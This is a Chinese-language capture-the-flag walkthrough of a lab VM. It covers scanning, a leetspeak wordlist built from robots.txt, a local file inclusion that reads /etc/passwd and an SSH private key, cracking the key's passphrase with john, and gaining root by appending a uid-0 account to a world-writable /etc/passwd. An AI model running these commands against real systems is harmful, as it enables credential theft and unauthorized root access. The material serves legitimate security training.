1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
┌──(root㉿kali)-[~]
└─# arp-scan -I eth1 -l 
Interface: eth1, type: EN10MB, MAC: 00:0c:29:26:ba:73, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:13       (Unknown: locally administered)
192.168.56.100  08:00:27:f4:ca:d5       PCS Systemtechnik GmbH
192.168.56.107  08:00:27:58:71:cb       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.005 seconds (127.68 hosts/sec). 3 responded
                                                                                                                                                                                    
┌──(root㉿kali)-[~]
└─# nmap -Pn -A -sV -T4 -p- 192.168.56.107 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-24 03:00 EST
Nmap scan report for 192.168.56.107
Host is up (0.00054s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 21:a5:80:4d:e9:b6:f0:db:71:4d:30:a0:69:3a:c5:0e (ECDSA)
|_  256 40:90:68:70:66:eb:f2:6c:f4:ca:f5:be:36:82:d0:72 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:58:71:CB (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.5
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 192.168.56.107

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.17 seconds
                                                                                                                                                                                    
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.56.107 
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/reports/http_192.168.56.107/_24-12-24_03-00-52.txt

Target: http://192.168.56.107/

[03:00:52] Starting: 
[03:00:54] 403 -  279B  - /.ht_wsr.txt
[03:00:54] 403 -  279B  - /.htaccess.sample
[03:00:54] 403 -  279B  - /.htaccess.save
[03:00:54] 403 -  279B  - /.htaccessOLD2
[03:00:54] 403 -  279B  - /.htaccess.bak1
[03:00:54] 403 -  279B  - /.htaccess_extra
[03:00:54] 403 -  279B  - /.htaccess_orig
[03:00:54] 403 -  279B  - /.htaccess.orig
[03:00:54] 403 -  279B  - /.htaccessBAK
[03:00:54] 403 -  279B  - /.htaccessOLD
[03:00:54] 403 -  279B  - /.htaccess_sc
[03:00:54] 403 -  279B  - /.html
[03:00:54] 403 -  279B  - /.htm
[03:00:54] 403 -  279B  - /.httr-oauth
[03:00:54] 403 -  279B  - /.htpasswds
[03:00:54] 403 -  279B  - /.htpasswd_test
[03:00:55] 403 -  279B  - /.php
[03:01:30] 200 -  755B  - /robots.txt
[03:01:31] 403 -  279B  - /server-status/
[03:01:31] 403 -  279B  - /server-status

Task Completed
                                                                                                                                                                                    
┌──(root㉿kali)-[~]
└─# curl -s http://192.168.56.107/robots.txt
A palanca-negra-gigante é uma subespécie de palanca-negra. De todas as subespécies, esta destaca-se pelo grande tamanho, sendo um dos ungulados africanos mais raros. Esta subespécie é endémica de Angola, apenas existindo em dois locais, o Parque Nacional de Cangandala e a Reserva Natural Integral de Luando. Em 2002, após a Guerra Civil Angolana, pouco se conhecia sobre a sobrevivência de múltiplas espécies em Angola e, de facto, receava-se que a Palanca Negra Gigante tivesse desaparecido. Em janeiro de 2004, um grupo do Centro de Estudos e Investigação Científica da Universidade Católica de Angola, liderado pelo Dr. Pedro vaz Pinto, obteve as primeiras evidências fotográficas do único rebanho que restava no Parque Nacional de Cangandala, ao sul de Malanje, confirmando-se assim a persistência da população após um duro período de guerra.
Atualmente, a Palanca Negra Gigante é considerada como o símbolo nacional de Angola, sendo motivo de orgulho para o povo angolano. Como prova disso, a seleção de futebol angolana é denominada de palancas-negras e a companhia aérea angolana, TAAG, tem este antílope como símbolo. Palanca é também o nome de uma das subdivisões da cidade de Luanda, capital de Angola. Na mitologia africana, assim como outros antílopes, eles simbolizam vivacidade, velocidade, beleza e nitidez visual

巨大的黑杠杆是黑杠杆的一个分支。在所有亚物种中,这一物种以其巨大的体型而闻名,是非洲最稀有的有蹄类动物之一。这个subespa©cie a©enda©mica de Angola,只存在于两个地方,坎甘达拉国家公园和卢安多综合自然保护区。2002年,安哥拉内战结束后,人们对安哥拉许多物种的生存知之甚少,事实上,人们担心巨大的黑杠杆已经消失。中心2004年1月,一组研究和investigaã§的£cientã-大学catã³lica安哥拉博士领导,彼得去画,从第一批evid㪔fotogrã¡站在剩下º尼克羊群Cangandala国家公园,在安哥拉南部,坚定了这样的persistãª的populaã§的£apã³艰苦年代perã-odo战争。
目前,巨型黑杠杆a©被认为是安哥拉的国家象征,是安哥拉人民的骄傲。为了证明这一点,安哥拉足球队a©被称为palancas-negras和公司aa©rea angolana, TAAG,有这个anta -lope作为他们的标志。Palanca©tamba©m安哥拉首都罗安达市的一个分支的名字。在非洲神话中,就像其他祖先一样,它们象征着活力、速度、美丽和视觉清晰度

没有其他信息 就从robots入手

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
┌──(root㉿kali)-[/tmp]
└─# curl -s http://192.168.56.107/robots.txt > tmp.txt
                                                                                                                                                                                    
┌──(root㉿kali)-[/tmp]
└─# cat tmp.txt                                       
A palanca-negra-gigante é uma subespécie de palanca-negra. De todas as subespécies, esta destaca-se pelo grande tamanho, sendo um dos ungulados africanos mais raros. Esta subespécie é endémica de Angola, apenas existindo em dois locais, o Parque Nacional de Cangandala e a Reserva Natural Integral de Luando. Em 2002, após a Guerra Civil Angolana, pouco se conhecia sobre a sobrevivência de múltiplas espécies em Angola e, de facto, receava-se que a Palanca Negra Gigante tivesse desaparecido. Em janeiro de 2004, um grupo do Centro de Estudos e Investigação Científica da Universidade Católica de Angola, liderado pelo Dr. Pedro vaz Pinto, obteve as primeiras evidências fotográficas do único rebanho que restava no Parque Nacional de Cangandala, ao sul de Malanje, confirmando-se assim a persistência da população após um duro período de guerra.
Atualmente, a Palanca Negra Gigante é considerada como o símbolo nacional de Angola, sendo motivo de orgulho para o povo angolano. Como prova disso, a seleção de futebol angolana é denominada de palancas-negras e a companhia aérea angolana, TAAG, tem este antílope como símbolo. Palanca é também o nome de uma das subdivisões da cidade de Luanda, capital de Angola. Na mitologia africana, assim como outros antílopes, eles simbolizam vivacidade, velocidade, beleza e nitidez visual
                                                                                                                                                                                    
┌──(root㉿kali)-[/tmp]
└─# cat tmp.txt | grep -P '\w+'                                                                                                                     
A palanca-negra-gigante é uma subespécie de palanca-negra. De todas as subespécies, esta destaca-se pelo grande tamanho, sendo um dos ungulados africanos mais raros. Esta subespécie é endémica de Angola, apenas existindo em dois locais, o Parque Nacional de Cangandala e a Reserva Natural Integral de Luando. Em 2002, após a Guerra Civil Angolana, pouco se conhecia sobre a sobrevivência de múltiplas espécies em Angola e, de facto, receava-se que a Palanca Negra Gigante tivesse desaparecido. Em janeiro de 2004, um grupo do Centro de Estudos e Investigação Científica da Universidade Católica de Angola, liderado pelo Dr. Pedro vaz Pinto, obteve as primeiras evidências fotográficas do único rebanho que restava no Parque Nacional de Cangandala, ao sul de Malanje, confirmando-se assim a persistência da população após um duro período de guerra.
Atualmente, a Palanca Negra Gigante é considerada como o símbolo nacional de Angola, sendo motivo de orgulho para o povo angolano. Como prova disso, a seleção de futebol angolana é denominada de palancas-negras e a companhia aérea angolana, TAAG, tem este antílope como símbolo. Palanca é também o nome de uma das subdivisões da cidade de Luanda, capital de Angola. Na mitologia africana, assim como outros antílopes, eles simbolizam vivacidade, velocidade, beleza e nitidez visual
                                                                                                                                                                                    
┌──(root㉿kali)-[/tmp]
└─# cat tmp.txt | grep -P '\w+' -o
A
palanca
negra
gigante
uma
subesp
cie
de
palanca
negra
De
todas
as
subesp
cies
esta
destaca
se
pelo
grande
tamanho
sendo
um
dos
ungulados
africanos
mais
raros
Esta
subesp
cie
end
mica
de
Angola
apenas
existindo
em
dois
locais
o
Parque
Nacional
de
Cangandala
e
a
Reserva
Natural
Integral
de
Luando
Em
2002
ap
s
a
Guerra
Civil
Angolana
pouco
se
conhecia
sobre
a
sobreviv
ncia
de
m
ltiplas
esp
cies
em
Angola
e
de
facto
receava
se
que
a
Palanca
Negra
Gigante
tivesse
desaparecido
Em
janeiro
de
2004
um
grupo
do
Centro
de
Estudos
e
Investiga
o
Cient
fica
da
Universidade
Cat
lica
de
Angola
liderado
pelo
Dr
Pedro
vaz
Pinto
obteve
as
primeiras
evid
ncias
fotogr
ficas
do
nico
rebanho
que
restava
no
Parque
Nacional
de
Cangandala
ao
sul
de
Malanje
confirmando
se
assim
a
persist
ncia
da
popula
o
ap
s
um
duro
per
odo
de
guerra
Atualmente
a
Palanca
Negra
Gigante
considerada
como
o
s
mbolo
nacional
de
Angola
sendo
motivo
de
orgulho
para
o
povo
angolano
Como
prova
disso
a
sele
o
de
futebol
angolana
denominada
de
palancas
negras
e
a
companhia
a
rea
angolana
TAAG
tem
este
ant
lope
como
s
mbolo
Palanca
tamb
m
o
nome
de
uma
das
subdivis
es
da
cidade
de
Luanda
capital
de
Angola
Na
mitologia
africana
assim
como
outros
ant
lopes
eles
simbolizam
vivacidade
velocidade
beleza
e
nitidez
visual
                                                                                                                                                                                    
┌──(root㉿kali)-[/tmp]
└─# cat tmp.txt | grep -P '\w+' -o|sort|uniq
2002
2004
a
A
africana
africanos
Angola
angolana
Angolana
angolano
ant
ao
ap
apenas
as
assim
Atualmente
beleza
Cangandala
capital
Cat
Centro
cidade
cie
Cient
cies
Civil
como
Como
companhia
confirmando
conhecia
considerada
da
das
de
De
denominada
desaparecido
destaca
disso
do
dois
dos
Dr
duro
e
eles
em
Em
end
es
esp
esta
Esta
este
Estudos
evid
existindo
facto
fica
ficas
fotogr
futebol
gigante
Gigante
grande
grupo
guerra
Guerra
Integral
Investiga
janeiro
lica
liderado
locais
lope
lopes
ltiplas
Luanda
Luando
m
mais
Malanje
mbolo
mica
mitologia
motivo
Na
nacional
Nacional
Natural
ncia
ncias
negra
Negra
negras
nico
nitidez
no
nome
o
obteve
odo
orgulho
outros
palanca
Palanca
palancas
para
Parque
Pedro
pelo
per
persist
Pinto
popula
pouco
povo
primeiras
prova
que
raros
rea
rebanho
receava
Reserva
restava
s
se
sele
sendo
simbolizam
sobre
sobreviv
subdivis
subesp
sul
TAAG
tamanho
tamb
tem
tivesse
todas
um
uma
ungulados
Universidade
vaz
velocidade
visual
vivacidade
                                                                                                                                                                                    
┌──(root㉿kali)-[/tmp]
└─# cat tmp.txt | grep -P '\w+' -o|sort|uniq > tmp1

看了佬们的思路发现还要生成变种字典

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
┌──(root㉿kali)-[/tmp]
└─# cat tmp1|sed -re 's/a/4/gi' -re 's/e/3/gi' -re 's/i|l/1/gi'
2002
2004
4
4
4fr1c4n4
4fr1c4nos
4ngo14
4ngo14n4
4ngo14n4
4ngo14no
4nt
4o
4p
4p3n4s
4s
4ss1m
4tu41m3nt3
b313z4
C4ng4nd414
c4p1t41
C4t
C3ntro
c1d4d3
c13
C13nt
c13s
C1v11
como
Como
comp4nh14
conf1rm4ndo
conh3c14
cons1d3r4d4
d4
d4s
d3
D3
d3nom1n4d4
d3s4p4r3c1do
d3st4c4
d1sso
do
do1s
dos
Dr
duro
3
313s
3m
3m
3nd
3s
3sp
3st4
3st4
3st3
3studos
3v1d
3x1st1ndo
f4cto
f1c4
f1c4s
fotogr
fut3bo1
g1g4nt3
G1g4nt3
gr4nd3
grupo
gu3rr4
Gu3rr4
1nt3gr41
1nv3st1g4
j4n31ro
11c4
11d3r4do
1oc41s
1op3
1op3s
1t1p14s
1u4nd4
1u4ndo
m
m41s
M414nj3
mbo1o
m1c4
m1to1og14
mot1vo
N4
n4c1on41
N4c1on41
N4tur41
nc14
nc14s
n3gr4
N3gr4
n3gr4s
n1co
n1t1d3z
no
nom3
o
obt3v3
odo
orgu1ho
outros
p414nc4
P414nc4
p414nc4s
p4r4
P4rqu3
P3dro
p31o
p3r
p3rs1st
P1nto
popu14
pouco
povo
pr1m31r4s
prov4
qu3
r4ros
r34
r3b4nho
r3c34v4
R3s3rv4
r3st4v4
s
s3
s313
s3ndo
s1mbo11z4m
sobr3
sobr3v1v
subd1v1s
sub3sp
su1
T44G
t4m4nho
t4mb
t3m
t1v3ss3
tod4s
um
um4
ungu14dos
Un1v3rs1d4d3
v4z
v31oc1d4d3
v1su41
v1v4c1d4d3

直接扫目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
┌──(root㉿kali)-[/tmp]
└─# gobuster dir -u http://192.168.56.107 -w 1.txt                                                                       
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.107
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                1.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/n3gr4                (Status: 301) [Size: 316] [--> http://192.168.56.107/n3gr4/]
Progress: 152 / 153 (99.35%)
===============================================================
Finished
===============================================================

是个目录,继续扫没扫出来,考虑大小写

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[/tmp]
└─# cat 1.txt | tr A-Z a-z >2.txt

┌──(root㉿kali)-[/tmp]
└─# gobuster dir -u http://192.168.56.107/n3gr4 -w 2.txt -x.php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.107/n3gr4
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                2.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/m414nj3.php          (Status: 500) [Size: 0]
Progress: 304 / 306 (99.35%)
===============================================================
Finished
===============================================================

得到

1
http://192.168.56.107/n3gr4/m414nj3.php

fuzz参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(root㉿kali)-[/tmp]
└─# ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u http://192.168.56.107/n3gr4/m414nj3.php?FUZZ=/etc/passwd --fs 0 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://192.168.56.107/n3gr4/m414nj3.php?FUZZ=/etc/passwd
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

page                    [Status: 200, Size: 1066, Words: 5, Lines: 23, Duration: 8ms]
:: Progress: [4734/4734] :: Job [1/1] :: 3703 req/sec :: Duration: [0:00:01] :: Errors: 0 ::

直接读

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
p4l4nc4:x:1000:1000:p4l4nc4,,,:/home/p4l4nc4:/bin/bash

image-20241224162721976

可以读

直接读私钥,但是私钥连接不起作用

image-20241224162827675

拿私钥解出密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(root㉿kali)-[/tmp]
└─# vi id 
                                                                                                                                                                                    
┌──(root㉿kali)-[/tmp]
└─# ssh2john id > 11
                                                                                                                                                                                    
┌──(root㉿kali)-[/tmp]
└─# john 11 --wordlist=/root/yiyi/rockyou.txt    
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
friendster       (id)     
1g 0:00:00:12 DONE (2024-12-24 03:34) 0.07830g/s 52.62p/s 52.62c/s 52.62C/s evelyn..kelly
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                                    
┌──(root㉿kali)-[/tmp]
└─# john 11 --wordlist=/root/yiyi/rockyou.txt --show
Invalid options combination: "--show"
                                                                                                                                                                                    
┌──(root㉿kali)-[/tmp]
└─# john 11 --show                                  
id:friendster

1 password hash cracked, 0 left
                                                                                                                                                                                    
┌──(root㉿kali)-[/tmp]
└─# ssh p4l4nc4@192.168.56.107 -i id
p4l4nc4@192.168.56.107's password: 
Linux 4ng014 6.1.0-27-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.115-1 (2024-11-01) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Nov 13 17:10:08 2024 from 192.168.1.78
p4l4nc4@4ng014:~$

其他地方看看没东西 看看history

image-20241224163719505

1
2
p4l4nc4@4ng014:~$ ls -al /etc/passwd
-rw-rw-rw- 1 root root 1066 Nov 13 12:28 /etc/passwd

可写

那就结束了捏

1
p4l4nc4@4ng014:~$ echo 'yiyi:$1$T2iCawgc$JJNznsQd3Eezeu1Yh/SjO0:0:0:asdasd:/root:/bin/bash' >> /etc/passwd

image-20241224164148333